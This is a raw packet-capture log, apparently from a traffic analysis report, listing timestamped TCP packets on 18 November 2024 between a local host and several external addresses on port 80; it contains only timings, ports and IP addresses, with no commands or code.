                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.904711008 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.909593105 CET805018218.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.909786940 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.909786940 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.909812927 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.914931059 CET805018218.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.915142059 CET805018218.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.551526070 CET805018118.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.555475950 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.560890913 CET805018118.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.561063051 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.602781057 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.607891083 CET805018318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.607996941 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.610816956 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.610914946 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.615854025 CET805018318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.615936995 CET805018318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.757683992 CET805018218.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.758353949 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.763662100 CET805018218.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.763726950 CET5018280192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.769479036 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.774449110 CET805018447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.774512053 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.774590969 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.774605036 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.779587984 CET805018447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.779607058 CET805018447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.049937010 CET805018318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.050474882 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.055563927 CET805018318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.055613995 CET5018380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.064568996 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.069816113 CET805018547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.069930077 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.070079088 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.070108891 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.074856997 CET805018547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.075023890 CET805018547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.243254900 CET805018447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.243500948 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.249092102 CET805018447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.249155998 CET5018480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.256469011 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.261409044 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.261507988 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.261653900 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.261688948 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.266470909 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.266484022 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.548181057 CET805018547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.548461914 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.554043055 CET805018547.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.554136038 CET5018580192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.562035084 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.567111969 CET805018744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.567229986 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.567367077 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.567367077 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.572273970 CET805018744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.572284937 CET805018744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.701014996 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.701390028 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.708635092 CET805018613.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.708734035 CET5018680192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.714037895 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719089985 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719197989 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719450951 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.719476938 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.724090099 CET5018780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.724332094 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.725409985 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.727018118 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732044935 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732144117 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732295990 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.732316971 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.737384081 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.737396002 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.397389889 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.397620916 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398271084 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398416042 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403157949 CET805018944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403259039 CET5018980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403501987 CET805018818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.403556108 CET5018880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.410983086 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.411858082 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416271925 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416398048 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416529894 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416541100 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416867018 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.416922092 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.417191982 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.417210102 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.421946049 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.421983004 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.422558069 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.422569990 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.085973978 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.086246014 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.088438988 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.088587999 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.093173981 CET805019144.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.093241930 CET5019180192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.095904112 CET805019044.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.095956087 CET5019080192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.102561951 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.102561951 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108753920 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108768940 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.108851910 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109004974 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109004974 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109024048 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109119892 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.109146118 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.116727114 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.116744041 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.116754055 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.116765022 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.780350924 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.804831982 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.810359001 CET805019318.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.810456038 CET5019380192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.841706991 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.847223043 CET805019447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.847301960 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.923505068 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.923543930 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.928555012 CET805019447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.928566933 CET805019447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.581234932 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.581571102 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.588675976 CET805019218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.588746071 CET5019280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.597114086 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.602178097 CET805019518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.602257967 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.602457047 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.602495909 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.607342958 CET805019518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:30.608582020 CET805019518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.267496109 CET805019518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.267673016 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.275151014 CET805019518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.275203943 CET5019580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.369868994 CET805019447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.370007992 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.402960062 CET805019447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.403084993 CET5019480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.439451933 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.460994005 CET805019618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.461127996 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.461352110 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.461364031 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.475066900 CET805019618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.475708961 CET805019618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.476710081 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.483062983 CET805019744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.483151913 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.483350039 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.483370066 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.489633083 CET805019744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:31.490307093 CET805019744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.163541079 CET805019744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.163789988 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.163829088 CET805019618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.164741039 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.172132015 CET805019744.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.172207117 CET5019780192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.175260067 CET805019618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.175343990 CET5019680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.179635048 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.182015896 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.186903954 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.187072039 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.187381983 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.187407970 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.190635920 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.190741062 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.190862894 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.190877914 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.198168993 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.199753046 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.200280905 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:32.200293064 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.065588951 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.065840006 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.072129965 CET805019954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.072226048 CET5019980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.078428030 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083544970 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083642006 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083924055 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.083961010 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.088880062 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.088912010 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.668560982 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.668878078 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.674529076 CET805019813.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.674607992 CET5019880192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.682765007 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.687829971 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.687938929 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.688057899 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.688072920 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.693028927 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.693247080 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.931615114 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.931906939 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.942225933 CET805020018.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.942337036 CET5020080192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.947957993 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953001976 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953109026 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953206062 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.953216076 CET5020280192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.958389044 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:33.958426952 CET805020218.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.539189100 CET805020135.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.557943106 CET5020180192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:34.563410997 CET805020135.164.78.200192.168.2.7
